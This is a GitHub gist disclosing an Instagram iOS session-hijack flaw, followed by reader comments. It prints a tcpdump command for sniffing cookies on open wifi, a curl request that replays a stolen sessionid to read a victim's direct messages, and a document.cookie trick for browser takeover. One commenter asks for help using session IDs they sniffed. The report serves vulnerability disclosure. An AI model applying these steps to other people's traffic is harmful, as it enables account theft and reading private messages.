Skip to content

Instantly share code, notes, and snippets.

@stevegraham
Last active February 24, 2023 20:44
Show Gist options
  • Save stevegraham/9a98627eebd6b09d4483 to your computer and use it in GitHub Desktop.
Save stevegraham/9a98627eebd6b09d4483 to your computer and use it in GitHub Desktop.
FB Responsible Disclosure

Instagram iOS session hijack

Instagram makes API calls to non-HTTPS endpoints with session cookies in the request headers allowing full session hijack by a malicious actor.

Steps to reproduce (on Mac OS X):

  • Jump on an open or WEP encrypted wifi access point
  • Put your network interface into promiscuous mode filtering on i.instagram.com
     sudo tcpdump -In -i en0 -s 2048 -A dst i.instagram.com
    
  • Wait for someone to use the Instagram iOS app on the same network
  • Extract cookie request header from the resulting output
  • Use sessionid cookie parameter to make any api call as that user Even https endpoints like direct messages.
     curl -H 'User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+' \
      -H 'Cookie: sessionid=REDACTED' \ 
      https://i.instagram.com/api/v1/direct_share/inbox/`
    

This returns the user's direct message inbox as JSON

I was able to perform a session hijack on my own account on my laptop while someone else browsed instagram on my iPhone.

I was also able to:

  • take the cookie sniffed from the iOS app
  • go to instagram.com as an unlogged in user.
  • set document.cookie = $COOKIE
  • navigate to a profile
  • see I'm logged in as that user

There is some screwy behaviour where 'instagram.com/' gets into redirect loop, I will see if I can fix that. However going to 'instagram.com/someones_profile' works and shows me as logged in.

I think this attack is extremely severe because it allows full session hijack and is easily automated. I could go to the Apple Store tomorrow and reap thousands of accounts in one day, and then use them to post spam.

Recommendations:

  • Use SSL everywhere
  • Revoke all logged-in sessions?
@ceejayoz
Copy link

@jasiek The gist says the session is valid even on HTTPS endpoints.

@rmrhz
Copy link

rmrhz commented Jul 28, 2014

That's a nice catch.

@stevegraham
Copy link
Author

@jasiek once you have a cookie, any endpoint can be authenticated with the cookie, HTTPS or HTTP.

@jasonmp85
Copy link

"Sue"? Maybe not. But in the good ol' US of A you can probably be prosecuted under this by anyone with a sufficiently large axe to grind.

@donfrancisco
Copy link

Got the instasheep domain name if you want me to point it at a github repo.

@anands
Copy link

anands commented Jul 30, 2014

+1

@vs4vijay
Copy link

Cool

@netpawn
Copy link

netpawn commented Jul 31, 2014

As I read it works only on Mac though... right ?

@boserup
Copy link

boserup commented Jul 31, 2014

@Mamugian Given that the Instagram user is connected via an unsecured connection (HTTP) to the API, any device capable of TCP dumping will be able to do this.

@jlopez1286
Copy link

the tool is for what platform?? pc,mac,android???

@sasasa671
Copy link

@Mamugian could work on any unix/linux platform.

@josephrexme
Copy link

@jlopez1286 seriously? tcpdump. Didn't expect to see such question on this gist

@rashidasgari
Copy link

Im not really experienced with packet sniffing and all this advanced networking stuff. But i was able to do the packet sniffing on an unsecured network using WireShark and get the session ID of the cookie headers. What do i have to do from here? I would be grateful if anyone could help.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment